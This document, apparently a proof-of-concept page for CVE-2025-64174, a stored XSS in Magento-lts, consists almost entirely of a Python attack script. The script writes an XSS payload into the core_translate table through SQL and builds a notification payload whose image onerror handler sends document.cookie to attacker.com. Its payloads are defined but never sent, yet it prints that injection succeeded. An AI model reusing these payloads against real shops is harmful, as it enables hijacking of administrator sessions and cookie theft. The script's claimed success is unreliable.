CVE-2025-64174: Magento-lts 存储型XSS漏洞

# CVE-2025-64174 PoC - Magento-lts Stored XSS # This PoC demonstrates how to inject malicious script via database manipulation import requests import json # Configuration target_url = "http://target-magento.local" admin_path = "/admin" # Step 1: Login as admin with database access login_url = f"{target_url}{admin_path}/index/login" admin_session = requests.Session() # Login credentials login_data = { "username": "admin", "password": "admin_password", "form_key": "" # Get from page } # Step 2: Direct database injection via SQL (requires DB access) # Inject XSS payload into translation strings malicious_payload = '<script>alert(document.cookie)</script>' # SQL injection to poison translation data sql_payload = f""" UPDATE core_translate SET translate = '{malicious_payload}' WHERE store_id = 0 AND string LIKE '%Actions%'; """ # Step 3: Alternative - Poison notification feed # If admin has access to notification source manipulation notification_payload = { "title": "System Notification", "description": f"<img src=x onerror='fetch(\"https://attacker.com/steal?c=\"+document.cookie)'>" } # Step 4: Wait for admin to view the page # The XSS will execute when admin visits: # {target_url}/admin/admin/notification/index/ # Cleanup - Remove malicious entries after testing cleanup_sql = """ DELETE FROM core_translate WHERE translate LIKE '%<script>%'; """ print("PoC executed. XSS payload injected.") print("Waiting for administrator to access notification page...")